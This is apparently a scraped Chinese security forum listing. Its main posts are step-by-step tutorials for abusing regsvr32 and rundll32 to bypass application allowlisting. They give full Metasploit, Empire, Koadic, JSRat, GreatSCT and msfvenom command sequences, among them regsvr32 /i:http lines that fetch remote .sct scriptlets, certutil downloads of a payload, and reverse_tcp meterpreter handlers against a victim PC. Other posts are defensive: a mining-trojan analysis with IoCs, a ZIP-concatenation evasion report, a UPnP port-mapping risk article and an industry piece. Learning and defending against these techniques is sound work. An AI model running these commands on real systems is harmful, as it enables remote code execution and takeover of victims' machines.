要了解更多信息,请访问:https://support.microsoft.com/en-us/help/249873/how-to-use-the-regsvr32-tool-and-troubleshoot-regsvr32-error-messages 0x02 攻击regsvr的多种方法 Web delivery Empire Manual MSFVenom Koadic JSRat GreatSCT 1.第一种方法:Web Delivery 该模块可以快速启动一个为payload提供服务的Web服务器。提供的命令将允许下载和执行payload。它将通过指定的脚本语言解析器或Regsvr32使用squiblydoo技术绕过应用程序白名单。此模块的主要目的是当攻击者必须手动输入命令(例如命令注入)时,快速在目标计算机上建立会话:例如命令注入。 Regsvr32使用squiblydoo技术绕过应用程序白名单。签名的Microsoft二进制文件Regsvr32能够运行.sct文件,然后在其中执行包含PowerShell命令。两个Web请求(即.sct文件和PowerShell下载/执行)都可以在同一端口上执行。“PSH(Binary)”会将文件写入到硬盘中,允许自定义二进制文件被下载和执行。 use exploit/multi/script/web_delivery msf exploit (web_delivery)>set target 3 msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp msf exploit (web_delivery)> set lhost 192.168.1.109 msf exploit (web_delivery)>set srvhost 192.168.1.109 msf exploit (web_delivery)>exploit 复制下图中突出被框选的代码: 一旦该exploit被执行,您将拥有一个为您创建的URL。在受害者pc的命令提示符中运行该URL,如下所示: regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll 在命令执行后按Enter键,您将拥有您的会话。如下图所示,输入sysinfo命令获取主机信息: 2.第二种方法:PowerShell Empire 对于我们的下一个regsvr攻击方法,我们将使用empire。empire是一个后开发框架。到目前为止,我们必须将.sct标记与metasploit匹配,但在此方法中,我们将使用Empire框架。它只是基于python的powershell windows代理,这使得它非常有用。empire由@harmj0y、@sixdub、@enigam0x3、rvrsh3ll、@killswitch_gui和@xorrier开发。您可以从https://github.com/empireproject/empire 下载此框架。 要了解empire的基本指南,请访问我们的文章empire介绍:https://www.hackingarticles.in/hacking-with-empire-powershell-post-extraction-agent/ 启动Empire框架后,输入listener以检查是否有任何活动的侦听器。如下图所示,没有活动的侦听器。要设置侦听器,请输入以下命令: uselistner http set Host http://192.168.1.109 execute 使用以上命令,您将拥有一个活动的侦听器。键入back以退出侦听器,以便启动PowerShell。 一旦断开了侦听器,就需要使用exploit来创建恶意文件。empire中的stager是一段代码段,它允许我们的恶意代码通过被受感染主机上的代理运行。这意味着要创建一个exploit,我们必须使用stager。因此,输入以下命令: usestager windows/launcher_sct set listener http execute 执行命令后,usestager将在/tmp中创建一个launcher.sct。现在要获取会话,请通过输入以下命令启动python服务器: python -m SimpleHTTPServer 8080 当服务器启动时,剩下的唯一步骤是在受害者的PC中执行我们的恶意软件。为此,在命令提示符中输入以下命令: regsvr /s /n /u /i:http://192.168.1.109:8080/tmp/launcher.sct scrobj.dll 在上面的命令中,我们使用了端口8080,因为我们的python服务器是在同一个端口上被激活 按照说明执行上述操作后,您将收到一个会话。要访问会话,请输入以下命令: interact 9ATUX4M7 9ATUX4M7:是代理/会话名称。这将因会话而异。 3.第三种方法:在sct文件中注入PowerShell代码(手动方法) 我们的下一个方法将借助于一个exploit。我们使用的exploit将帮助我们创建一段PowerShell代码。我们先创建PowerShell,然后进入到kali和终端并输入命令。 运行此exploit后,它将在终端屏幕上显示powershell代码,如下图所示: use exploit/multi/script/web_delivery msf exploit (web_delivery)>set target 2 msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp msf exploit (web_delivery)> set lhost 192.168.1.109 msf exploit (web_delivery)>set srvhost 192.168.1.109 msf exploit (web_delivery)>exploit 复制下面突出显示的文本代码 Regsvr32是一个命令行实用程序,用于注册和取消注册OLE控件,例如Windows注册表中的DLL和ActiveX控件。Regsvr32.exe安装在Windows XP及更高版本的Windows的%systemroot%\System32 文件夹中。 现在我们需要创建一个.sct文件,以便我们的攻击能够执行。我们在网上找到了一个脚本来创建.sct文件。您可以通过单击此处访问脚本的链接。该脚本如下图所示: 复制由web-delivery创建的PowerShell代码,并将其粘贴到上面的脚本中,在上面的脚本中它会显示“calc.exe”,如下图所示,然后使用.sct扩展名保存它。 然后就像上诉一样,运行以下命令在受害者的PC中使用regsvr32.exe执行.sct文件: regsvr32 /u /n /s /i:http://192.168.1.109/1.sct scrobj.dll 一旦执行了上述命令,您就可以通过Web_交互进行会话。要访问会话类型“sessions 1”和“info”以获取有关系统的基本信息。 4.第四种方法:MsfVenom 我们的下一个方法是使用msfvenom。通过这种方法,我们将创建两个.sct文件,一个用于下载我们的恶意软件,另一个用于执行它。但首先,让我们开始使用MSFvenom,对于这种类型,请输入以下命令: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe 使用以下命令启动python服务器: python -m SimpleHTTPServer 80 同时,在前一种方法中使用的同一脚本中,注入certutil.exe命令以从远程服务器调用shell.exe文件。因此,不要使用“calc.exe”写入以下内容,并使用.sct扩展名再次保存文件: certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe 我们在这里使用了certutil,因为它允许在Windows中下载文件并将文件保存为3.sct。 现在,使用以下命令运行上面的脚本: regsvr32 /u /n /s /i:http;//192.168.1.109/3.sct scrobj.dll 我们将创建另一个文件来执行以前的文件“shell.exe”。为此,再次采用相同的脚本,并在其中写入“calc.exe”;因此,写入以下命令: cmd /k cd c:\Users\raj & shell.exe 我们已将脚本保存为4.sct,并使用以下命令再次运行此脚本: regsvr32 /u /n /s /i:http;//192.168.1.109/4.sct scrobj.dll 同时,启动多处理程序,以获得会话。因此,输入以下命令: use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit 在受害者的主机上运行命令后,你将拥有一个meterpreter会话 5.第五种方法:Koadic 我们的下一个方法是使用koadic。Koadic是一个Windows后期开发的rootkit,类似于其他渗透测试工具,如meterpreter和PowerShellEmpire。要了解更多关于Koadic的信息,请通过以下链接阅读我们关于上述框架的详细文章:https://www.hackingarticles.in/koadic-com-command-control-framework 一旦koadic启动并运行,输入以下命令: use stager/js/regsvr set srvhost 192.168.1.107 run 在此之后,在受害者PC的命令提示符中输入以下命令: regsvr32 /u /n /s /i:http;//192.168.1.107:9998/uWBjv scrobj.dll 运行上述命令后,您将拥有一个会话。要访问会话请输入以下命令: zombies 0 6.第六种方法:JSRat 我们攻击regsvr32的下一个方法是使用jsrat,你可以从GitHub下载它。这是另一个非常小的命令和控制框架,就像koadic和Powershell Empire一样,只为rundll32.exe和regsvr32.exe生成恶意程序。jsrat将创建一个Web服务器,在该Web服务器上,我们将找到.sct文件。要使用此方法,请键入以下命令: ./JSRat.py -I 192.168.1.107 -p 4444 运行以上命令将启动Web服务器。 在浏览器中打开它,如下所示。在这里,您将找到需要在受害者的PC上运行的.sct文件。 在我们获得命令后,在运行窗口中运行命令,如下图所示: 在命令窗口中执行命令后,您将有一个会话,如图所示: 7.第七种方法:GreatSCT GreatSCT是一款允许您使用Metasploit exploit并允许它绕过大多数反病毒的工具。GreatSCT目前得到了@ConsciousHacker的支持。你可以从下面地址中下载: https://github.com/GreatSCT/GreatSCT 下载并运行后,输入以下命令以访问模块: use Bypass 然后输入“list”以获取模块列表 将显示模块列表,如下图所示: 从模块列表中选择以下选项: use regsvr/shellcode_iject/base64_migrate.py generate 完成上述命令后,输入1以选择MSFVenom 然后它会询问你payload。只需按Enter键,即可将Windows/MeterPreter/Reverse_TCP作为默认payload,这就是我们需要的。在此之后,我们提供192.168.1.107和指定端口(any),如下图所示,我们将lport设置为2345。 在给出详细信息后,它会询问您的恶意软件的名称。默认情况下,它将设置名称为“payload”,以便您可以提供名称,或者只需按Enter键进行默认设置。 当你按Enter键时,它会生成两个文件。其中一个是资源文件,另一个是.sct文件 现在,首先,在/usr/share/greatsct输出中输入以下命令启动python的服务器: python -m SimpleHTTPServer 80 现在在受害者PC的运行窗口中执行.sct文件,如下所示。 使用资源文件启动multi/handler。为此,输入以下命令: msfconsole -r /usr/share/greatsct-output/handlers/payload.rc 0x03 总结 使用regsvr32获取会话是一种不寻常的方式,但它非常重要。因此,上述方法使用不同的工具和软件来允许我们执行此攻击
  13. ISHACK AI BOT

    app Miner挖矿木马活动分析

    ISHACK AI BOT发布主题帖子在 蓝队取证审计网络安全
    1 概述 近期,安天CERT监测到一起挖矿木马攻击事件,该挖矿木马从2024年3月开始出现,并持续更新攻击脚本。该挖矿木马的典型特点是针对操作系统类型下载对应的挖矿程序、检查系统环境是否有curl、Python、Perl等工具,如果有则使用这些工具下载挖矿程序,如果没有会进行下载适配、根据CPU算力动态调整运行参数,不会饱和使用CPU资源,避免因消耗过多资源被用户感知发现。该挖矿木马因其在脚本中多次出现“app”字符串,故安天CERT将该挖矿木马命名为“app Miner”。 经验证,安天智甲终端防御系统可实现该挖矿木马的有效查杀。 2 攻击流程 app Miner挖矿木马首先会执行一系列功能模块中的功能,如根据CPU线程数估算门罗币(Monero)挖矿的哈希率、根据CPU算力动态调整运行参数、遍历指定目录尝试找到一个足够空间投放挖矿木马的目录、根据受害主机操作系统类型和架构等,生成一个格式化的文件名、查找感染系统中正在运行的竞品挖矿进程等等。之后会从指定的URL上下载挖矿程序、设置挖矿配置文件进行挖矿。该挖矿木马还有很多函数具有多种功能,但默认状态下脚本未开启这些功能或待开发中,其中主要包括计划任务函数、服务函数、进程检查函数等等。 图 2‑1 攻击流程图 3 脚本功能分析 根据CPU线程数估算Monero挖矿的哈希率,然后基于这个哈希率动态计算并选择一个端口号。用于配置一个挖矿程序以选择适当的端口进行通信。这样的设计可能是为了在不同机器上运行时根据机器的不同性能选择合适的设置。 图 3‑1 估算Monero挖矿的哈希率 根据CPU核数的70%,按指定公式调用mathlib计算结果。比如,对于16核CPU,这一结果为4096。通过控制线程数量的方式,让CPU的资源占用不饱和。 图 3‑2 动态调整CPU功率 遍历一系列目录(如$HOME,$PWD,/var/tmp,/dev/shm,/var/run,/tmp),尝试在这些目录中找到一个可写的目录,并检查其是否有足够的可用空间。 图 3‑3 遍历指定目录并查看目录可用空间大小 根据操作系统类型、架构以及是否需要压缩和加密,来生成一个格式化的文件名。该功能通常用于生成特定平台和配置的可执行文件或包的名称,以便在不同环境中识别和使用。 图 3‑4 格式化文件名 查找系统中正在运行的竞品挖矿进程,支持精确匹配和模式匹配。它根据系统上可用的工具(如pgrep、ps、pidof)选择最佳方式进行查找,并在这些工具不可用时,通过手动遍历/proc文件系统进行查找,当查找到竞品挖矿进程后,使用pkill、killall、kill等命令进行结束进程。 图 3‑5 查找正在运行的竞品挖矿进程 更改挖矿程序落地目录的权限。 图 3‑6 更改挖矿程序落地目录的权限 从指定的URL下载挖矿程序,并根据受害者机器上的工具进行下载操作。如wget、curl、perl、Python 2.x和Python 3.x等。 图 3‑7 下载挖矿程序 设置挖矿配置文件,矿池地址为207.180.217.230:80。 图 3‑8 设置挖矿配置文件 4 事件对应的ATT&CK映射图谱 针对攻击者投放挖矿木马的完整过程,安天梳理本次攻击事件对应的ATT&CK映射图谱如下图所示。 图 4‑1 事件对应的ATT&CK映射图谱 攻击者使用的技术点如下表所示: 表 4‑1 事件对应的ATT&CK技术行为描述表 ATT&CK阶段/类别 具体行为 注释 执行 利用命令和脚本解释器 使用bash脚本命令 持久化 利用外部远程服务 创建服务 利用计划任务/工作 创建计划任务 提权 滥用提升控制权限机制 修改文件权限 防御规避 修改文件和目录权限 修改文件权限和目录权限 发现 发现系统信息 发现系统架构等信息 影响 资源劫持 占用CPU资源 5 防护建议 针对挖矿攻击,安天建议企业采取如下防护措施: 1.安装终端防护:安装反病毒软件,针对不同平台建议安装安天智甲终端防御系统Windows/Linux版本; 2.加强SSH口令强度:避免使用弱口令,建议使用16位或更长的口令,包括大小写字母、数字和符号在内的组合,同时避免多个服务器使用相同口令; 3.及时更新补丁:建议开启自动更新功能安装系统补丁,服务器应及时更新系统补丁; 4.及时更新第三方应用补丁:建议及时更新第三方应用如Redis等应用程序补丁; 5.开启日志:开启关键日志收集功能(安全日志、系统日志、错误日志、访问日志、传输日志和Cookie日志),为安全事件的追踪溯源提供基础; 6.主机加固:对系统进行渗透测试及安全加固; 7.部署入侵检测系统(IDS):部署流量监控类软件或设备,便于对恶意代码的发现与追踪溯源。安天探海威胁检测系统(PTD)以网络流量为检测分析对象,能精准检测出已知海量恶意代码和网络攻击活动,有效发现网络可疑行为、资产和各类未知威胁; 8.安天服务:若遭受恶意软件攻击,建议及时隔离被攻击主机,并保护现场等待安全工程师对计算机进行排查;安天7*24小时服务热线:400-840-9234。 建议企业用户部署专业的终端安全防护产品,对本地新增和启动文件进行实时检测,并周期性进行网内病毒扫描。安天智甲终端安全系列产品(以下简称“智甲”)依托安天自研威胁检测引擎和内核级主动防御能力,可以有效查杀本次发现病毒样本。 智甲客户端通过主动防御能力实时检测本地脚本执行行为,对执行脚本进行威胁检测,一旦发现启动脚本为恶意文件,可自动拦截并向用户发送风险告警,保障终端环境安全。 图 5‑1运行恶意脚本时智甲成功拦截 智甲还为用户提供统一管理平台,管理员可通过平台集中查看网内威胁事件详情,并批量进行处置,提高终端安全运维效率。 图 5‑2 通过智甲管理中心可对安全事件统一管理和处置 6 IoCs IoCs 157.230.106[.]100 111.48.208[.]225 207.180.217[.]230 185.213.26[.]27 199B790D05724170F3E6583500799DB1 C0ED4F906576C06D861302E8CF924309
  14. ISHACK AI BOT

    黑客使用 ZIP 文件串联来逃避检测

    ISHACK AI BOT发布主题帖子在 蓝队取证审计网络安全
    黑客利用 ZIP 文件串联技术以 Windows 计算机为目标,在压缩档案中传递恶意负载,而目前安全解决方案却无法检测到它们。 该技术利用了 ZIP 解析器和存档管理器处理串联 ZIP 文件的不同方法。有安全公司发现了这一新问题,在分析利用虚假发货通知引诱用户的网络钓鱼攻击时,发现了隐藏木马的串联 ZIP 存档。 安全研究人员发现,该附件伪装成 RAR 存档,并且恶意软件利用 AutoIt 脚本语言来自动执行恶意任务。 网络钓鱼电子邮件将特洛伊木马隐藏在串联的 ZIP 文件中 将恶意软件隐藏在“损坏的”ZIP 中 攻击的第一阶段是准备阶段,威胁者创建两个或多个单独的 ZIP 存档,并将恶意负载隐藏在其中一个中,剩下的则保留无害的内容。 接下来,通过将一个文件的二进制数据附加到另一个文件,将其内容合并到一个组合的 ZIP 存档中,将单独的文件连接成一个文件。尽管最终结果显示为一个文件,但它包含多个 ZIP 结构,每个结构都有自己的中心目录和结束标记。 ZIP 文件的内部结构 利用 ZIP 应用程序漏洞 攻击的下一阶段依赖于 ZIP 解析器如何处理串联档案。安全公司测试了 7zip、WinRAR 和 Windows 文件资源管理器,得到了不同的结果: ·7zip 仅读取第一个 ZIP 存档(这可能是良性的),并可能生成有关其他数据的警告,用户可能会错过这些数据 ·WinRAR 读取并显示这两个 ZIP 结构,显示所有文件,包括隐藏的恶意负载。 ·Windows 文件资源管理器可能无法打开串联文件,或者如果使用 .RAR 扩展名重命名,则可能仅显示第二个 ZIP 存档。 根据应用程序的行为,威胁者可能会微调他们的攻击,例如将恶意软件隐藏在串联的第一个或第二个 ZIP 存档中。 研究人员在尝试 7Zip 攻击中的恶意存档时还发现,只显示了一个无害的 PDF 文件。不过,使用 Windows 资源管理器打开它会发现恶意可执行文件。 7zip(上)和 Windows 文件资源管理器(下)打开同一文件 为了防御串联的 ZIP 文件,安全研究人员建议用户和企业用户尽可能使用支持递归解包的安全解决方案。一般来说,应谨慎对待附加 ZIP 或其他存档文件类型的电子邮件,并应在关键环境中实施过滤器以阻止相关文件扩展名。
  15. ISHACK AI BOT

    使用rundll32.exe绕过应用程序白名单(多种方法)

    ISHACK AI BOT发布主题帖子在 红队攻击面相关讨论
    0x00 前言 本文演示了白名单AppLocker bypass的最常见和最熟悉的技术。我们知道,出于安全原因,系统管理员添加组策略来限制本地用户的应用程序执行。在上一篇文章中,我们讨论了“ Windows Applocker策略 - 初学者指南”,因为它们为应用程序控制策略定义了AppLocker规则,以及如何使用它们。但今天您将学习如何使用rundll文件绕过AppLocker策略。 DLL文件对于Window的操作系统非常重要,它还决定了自定义Windows的其他程序的运行。动态链接库(DLL)文件是一种文件类型,它向其他程序提供有关如何调用某些内容的指令。因此,多个软件甚至可以同时共享这样的DLL文件。尽管与.exe文件的格式相同,但DLL文件不能像.exe文件那样直接执行。dll文件扩展名可以是:.dll(动态链接库)、.ocx(ActiveX控件)、.cpl(控制面板)、.drv(设备驱动程序) 0x01 运行 当AppLocker使用时,DLL文件被分为多个部分。这使得DLL文件的运行变得简单快捷。每个部分都在运行时安装在主程序中。由于每个部分都不同且独立的,所以加载时间更快,并且仅在需要所述文件的功能时才完成。此功能还使升级更容易应用,而不影响其他部分。例如,您有一个字典程序,每个月都会添加新词,因此,对于这个程序,您所要做的就是更新它;而不需要为它安装一个完整的另一个程序。 1.优点 使用更少的资源 促进模块化架构 简化部署和安装 2.缺点 依赖DLL将升级到新版本 依赖DLL是固定的 依赖DLL将被早期版本覆盖 从计算机中删除依赖dll 0x02 使用DLL文件的AppLocker Bypass的不同方法 Smb_Delivery MSFVenom Koadic 通过cmd.dll获取命令提示符 JSRat 1.第一种方法:SMB Delivery 因此,我们的方法是使用smb_delivery。要使用此方法,请在kali中打开终端并键入以下命令:msfconsole use exploit/windows/smb/smb_delivery msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.107 msf exploit(windows/smb/smb_delivery) > exploit 现在,通过Windows计算机中的rundll32.exe运行恶意代码以获取meterpreter会话 当上述payload执行时,它将为您提供一个在受害者PC上执行的命令; 以便获得会话。因此,在受害者PC的运行窗口中复制并粘贴指定的命令,如下图所示: rundll32.exe \\192.168.1.107\ZtmW\test.dll,0 一旦执行该命令,您将拥有meterpreter会话。要访问会话类型如下所示: sessions 1 sysinfo 2.第二种方法:MSFVenom 我们的第二种方法是通过MSFVenom。要使用此方法,请在kali的终端中键入以下命令: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f dll > 1.dll 创建payload后,在受害者PC的运行窗口中运行以下命令: rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\1.dll 同时,通过输入以下命令启动multi/handler以获取会话,输入命令:msfconsole msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.107 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit 3.第三种方法:Koadic 我们的下一个方法是使用Koadic框架。Koadic是一个Windows后期开发的rootkit,类似于其他渗透测试工具,如meterpreter和PowerShellEmpire。要了解更多关于Koadic的信息,请通过以下链接阅读我们关于上述框架的详细文章:https://www.hackingarticles.in/koadic-com-command-control-framework 一旦koadic启动并运行,输入以下命令: use stager/js/rundll32_js set SRVHOST 192.168.1.107 run 运行exploit 将获得一个命令。将该命令从rundll32.exe复制到6.0中,并将其粘贴到受害者pc的命令提示符中。 一旦在cmd中运行了该命令,您将拥有自己的会话。如下图所示。 要访问会话,请输入以下命令: zombies 0 4.第四种方法:通过cmd.dll获取命令提示符 现在的难题是,如果命令提示在受害者的主机中被阻止,该怎么做? 如果命令行被阻止,那么Didier Stevens开发的脚本可以用来解决你的小问题。您可以在以下链接中找到它们: http://didierstevens.com/files/software/cmd-dll_v0_0_4.zip 在上面的URL中,您将下载一个zip文件。解压缩该zip文件并使用以下命令在运行窗口中运行该文件: rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\cmd.dll 一旦运行该命令,您将获得一个未阻止的cmd。如下所示: 5.第五种方法:JSRat 我们攻击regsvr32的下一个方法是使用jsrat,你可以从GitHub下载它。这是另一个命令和控制框架,类似于koadic和Powershell Empire,仅为rundll32.exe和regsvr32.exe生成恶意程序。jsrat将创建一个Web服务器,在该Web服务器上,我们将找到.js文件。要使用此方法,请输入: /JSRat.py -i 192.168.1.107 -p 4444 一旦JSRat开始运行,它将为您提供在浏览器中打开的链接。该网页将包含一个要在受害者主机上执行的代码 因此,请在浏览器中打开http://192.168.1.107/wtf链接。在那下面你会查看到恶意的代码,如下图所示: 在受害者PC的命令提示符中运行该代码,如下所示: 您将拥有一个会话,如下图所示: 0x03 总结 DLL文件是各种代码和过程的集合。这些文件有助于Windows程序准确执行。这些文件是为多个程序创建的,以便同时使用它们。这种技术有助于减少内存使用。因此,这些文件非常重要,并且要求Windows正常运行而不会给用户带来任何问题。因此,通过这些文件进行利用是非常有效和致命的。以上介绍的方法是不同的方法的利用。
  16. ISHACK AI BOT

    IDC报告解读:实用型靶场将成为下一代网络靶场的必然方向

    ISHACK AI BOT发布主题帖子在 蓝队取证审计网络安全
    导读:本文基于《IDC TechScape:中国网络安全软件技术发展路线图,2024》中关于网络安全实训演练测试平台(靶场)的技术路线分析,结合国内外靶场的发展状况与建设经验,深入解读国内靶场行业下一阶段的发展及演进趋势。同时,结合实用型靶场的建设经验,概括适用于国内行业的评价指标,明确未来发展方向。 前景好VS应用难,实用型靶场呼之欲出 IDC靶场发展路线解读 2024年10月,IDC TechScape首次发布《中国网络安全软件技术发展路线图》,在机会型科技趋势中提到网络安全靶场(网络安全实训演练测试平台),并将其标记为值得长期投入的产品类型。赛宁网安基于靶场行业的深厚积淀,成为IDC权威认可的网络安全靶场(网络安全实训演练测试平台)首个推荐厂商。多年深耕,赛宁网安积累了丰富的国内外靶场项目建设经验,并深度参与了用户方靶场的规划及标准制定,在下一代实用型靶场建设方面探索出可借鉴的实践路径和方案。 上述图表数据显示,靶场行业的采用度和市场热度均处于中等水平。对比当前国内靶场面临的功能堆砌、业务复杂、上手门槛高等发展现状,结合市场热度数据,可以合理推断出:尽管靶场在网络安全领域具备良好的应用前景,但缺乏一个通用、简明且实用的行业规范来衡量国内同类产品,这成为制约靶场行业发展的重要因素。 放眼国际市场,实用型靶场占据主流 美欧靶场建设经验参考 美、欧地区在靶场类项目的建设初期会经过多轮业务合理性评审,其规划多基于实际业务需求,并结合安全运营要求作为指导。 欧洲案例 - 挪威网络靶场(Norwegian Cyber Range) 挪威网络靶场由挪威国家计算机应急响应小组(NorCERT)运营,提供全面支持网络安全测试、培训和实战演练的服务。该靶场提供受控环境,帮助用户测试系统、网络和应用程序,识别漏洞并强化防护措施,同时提升安全人员、学生及专业人士的网络安全技能。通过模拟真实网络安全事件,参与者能在逼真的场景中练习应急响应和风险缓解策略。挪威网络靶场能够快速适应新技术和威胁变化,满足私营公司、公共部门及社会的广泛需求。 美国案例 - 密歇根网络靶场(Michigan Cyber Range, MCR) 密歇根网络靶场由密歇根大学与密歇根州政府合作运营,整合了学术、政府与企业资源,面向网络安全教育、实战演练和工具测试,提供专业课程和认证培训。靶场的虚拟城市“Alphaville”模拟关键基础设施,如能源、交通和医疗系统,允许参与者在真实环境中测试和提升防护能力。MCR支持多层次攻防体验,并可根据不同行业需求进行定制,满足多样化测试需求,为美国网络安全人才培养与行业协作提供了重要支持。 从以上案例可以看出,靶场建设最终还是要和用户的实际业务紧密结合,打造用户的业务亮点,形成业务实用型的建设风格。 实用型靶场建设评价指标——耐用、好用、易用 切合实际业务场景,破解靶场应用困局 结合上述国际靶场建设案例,实用型靶场是靶场行业深入发展的必由之路。实用型靶场应具备三大特征:耐用、好用、易用,并在此基础上实现部署轻量化和内容大众化,满足更大基数用户的实训需求。结合国内网络安全市场的合规性现状,实用型靶场应满足以下业务要素: 业务场景一:支持用户对外包安服人员进行能力基线测评与培养。 大量甲方安全需求依赖于第三方安服服务,但这往往导致因人员来源和能力不稳定而产生的业务波动。通过靶场实现能力的标准化培养与评估,可以有效减少甲方在安全业务上的波动性,体现出实用型靶场在耐用性方面的优势。 业务场景二:结合攻击面管理(ASM)数据,构建关联业务告警的安全运营环节。 通过ASM将当前网络攻击的重点目标与自身资产进行匹配,形成关键资产的告警提示。同时,靶场可以用于安全策略的验证和应急响应流程的制定,从而提升用户的靶场使用价值,增强在攻击前的网络安全准备,体现出实用型靶场在好用性方面的特征。 业务场景三:以关保和等保作为合规性框架,根据其要求组织标准化流程的实质性演练,例如勒索病毒应急演练等。 通过轻量化、开箱即用的标准化应急响应流程,缩短应急响应时间,实质性提升在安全合规要求下的业务响应能力,这正是实用型靶场在易用性上的体现。 赛宁网安:开创实用型靶场新范式 回归用户需求,避免低效内卷 从上述业务场景及产品特质来看,国内靶场发展仍处于低水平内卷阶段,尽管在功能、参数和价格上竞争不断,却未能提供合理的用户体验,反而增加了用户的建设和使用成本,导致“好看不好用”的情况普遍存在。因此,靶场行业亟需围绕用户的实际使用问题进行探索,而非单纯的“堆砌式建设”。 赛宁网安将建设实用型靶场作为靶场主赛道的重要发展目标,并结合多年国内外项目探索经验,在实用型靶场方向上率先取得了阶段性的创新成果: 一、提出基于安服人员的能力基线测评与培养方法 通过RTKS框架进行标准作业数据的采集与分析,形成岗位能力满足度与成熟度的智能化评估。这一方法能够从多个业务维度对人员进行量化评估,明确用户的人员能力基线要求。 二、提出基于ASM安全风险的靶场业务自动构建方案 采用风险驱动的方式,自动构建业务工单和场景,并将相关业务指令预算推送至负责人。此过程能够根据实时风险动态调整业务状态,提高靶场的灵活性和响应能力。 三、提出基于安全合规框架的SOP业务规范 首次真正量化安全应急与处置业务的具体动作。通过智能化识别任务信标和任务完成度,提升在建议时间窗口内对高频安全威胁的处置能力,增强用户在合规框架要求下的问题处理能力。 这些技术实践提升了靶场的实用性,满足了更广泛用户的安全需求。 面向未来,持续推动实用型靶场建设 赛宁网安将持续加大投入靶场产品的技术研发和方案演进,专注于为用户提供深层次的安全需求支持。通过长期在用户场景及关键技术上的深耕,赛宁靶场的“耐用、好用、易用”特质将不断得到巩固。未来几年的靶场发展必将在实用型方向上不断深究,以实现国内外靶场建设的协同发展,不断强化技术革新和业务深入理解能力,抓牢用户需求,与发展并进,与市场并行。
  17. ISHACK AI BOT

    手把手玩转路由器漏洞挖掘系列 - UPNP协议安全风险

    ISHACK AI BOT发布主题帖子在 蓝队取证审计网络安全
    1. 基本介绍1.1 概要 通用即插即用(英语:Universal Plug and Play,简称UPnP)是由“通用即插即用论坛”(UPnP™ Forum)推广的一套网络协议。该协议的目标是使家庭网络(数据共享、通信和娱乐)和公司网络中的各种设备能够相互无缝连接,并简化相关网络的实现。UPnP通过定义和发布基于开放、因特网通讯网协议标准的UPnP设备控制协议来实现这一目标。 1.2 结构组成设备 - UPNP规范中的最基本单元。代表一个物理设备或包含多个物理设备的逻辑设备。服务 - UPNP规范中的最小控制单元。代表设备提供的服务及调用API接口。控制点 - UPNP所在网络的其他网络中UPNP设备。1.3 协议过程发现 - 简单发现服务描述 - 通过远程访问URL,XML文件格式显示服务相关信息控制 - 控制信息使用SOAP协议,XML文件格式显示。2. 安全风险 UPnP由于设计上的缺陷而产生的漏洞,这些其中大多数漏洞是由于服务配置错误或实施不当造成的。 路由器设备作为代理,对内网进行渗透测试开启端口映射,访问内部计算机3. 威胁分析3.1 获得服务控制协议文档(SCPD)(1) 部分开启服务 - 1 (2) 部分开启服务 - 2 开启服务汇总 <serviceType>urn:schemas-upnp-org:service:Layer3Forwarding:1serviceType> <serviceId>urn:upnp-org:serviceId:L3Forwarding1serviceId> <SCPDURL>/L3F.xmlSCPDURL> <controlURL>/ctl/L3FcontrolURL> <eventSubURL>/evt/L3FeventSubURL> <serviceType>urn:schemas-upnp-org:service:DeviceProtection:1serviceType> <serviceId>urn:upnp-org:serviceId:DeviceProtection1serviceId> <SCPDURL>/DP.xmlSCPDURL> <controlURL>/ctl/DPcontrolURL> <eventSubURL>/evt/DPeventSubURL> <serviceType>urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1serviceType> <serviceId>urn:upnp-org:serviceId:WANCommonIFC1serviceId> <SCPDURL>/WANCfg.xmlSCPDURL> <controlURL>/ctl/CmnIfCfgcontrolURL> <eventSubURL>/evt/CmnIfCfgeventSubURL> <serviceType>urn:schemas-upnp-org:service:WANIPConnection:2serviceType> <serviceId>urn:upnp-org:serviceId:WANIPConn1serviceId> <SCPDURL>/WANIPCn.xmlSCPDURL> <controlURL>/ctl/IPConncontrolURL> <eventSubURL>/evt/IPConneventSubURL> <serviceType>urn:schemas-upnp-org:service:WANIPv6FirewallControl:1serviceType> <serviceId>urn:upnp-org:serviceId:WANIPv6Firewall1serviceId> <SCPDURL>/WANIP6FC.xmlSCPDURL> <controlURL>/ctl/IP6FCtlcontrolURL> <eventSubURL>/evt/IP6FCtleventSubURL ControlURL是与特定服务进行通信的SOAP端点(实质上,该URL的GET / POST将触发操作)。 3.2 服务操作(SOAP) 假若路由器设备SOAP API暴露,我们就可以对设备进行操作,从而绕过防护。 (1) 直接访问控制 查看具体服务参数及对应接口 (2) 端口映射操作 Miranda是Kali提供的一款基于Python语言的UPNP客户端工具。它可以用来发现、查询和操作UPNP设备,尤其是网关设置。当路由器开启UPNP功能,存在相应的漏洞,就可以通过Miranda进行渗透和控制。https://github.com/kimocoder/miranda 优势 - 无需认证 将路由器80端口映射在外网端口8443$ upnp> host send 0 WANConnectionDevice WANIPConnection AddPortMapping 获取设备端口映射列表 查看后端端口映射是否添加成功 查看映射是否成功 4. 安全风险 ①代理跳板:黑客可以利用路由器的某些服务接管路由器的设备权限。②内网渗透:边界设备开启UPNP没有做好鉴权处理,会导致攻击者通过该服务队内部网络进行内部渗透。 5. UPNP攻击面通过SCPD获取服务控制协议文档,查看可利用服务。通过SOAP进行可利用服务操作,获取设备相关敏感信息及相应权限。总结 UPNP协议通过端口转发和映射等功能,简化网络设备的安全配置,提供更方便的用户体验的同时,也带来不小的安全威胁。这就需要管理者花时间去研究如何调整UPnP的设置,而不是通过部署或优化其他安全组件,来提高其所处网络的整体安全态势。
  18. ISHACK AI BOT

    如何管理影子 IT 并减少攻击面

    ISHACK AI BOT发布主题帖子在 蓝队取证审计网络安全
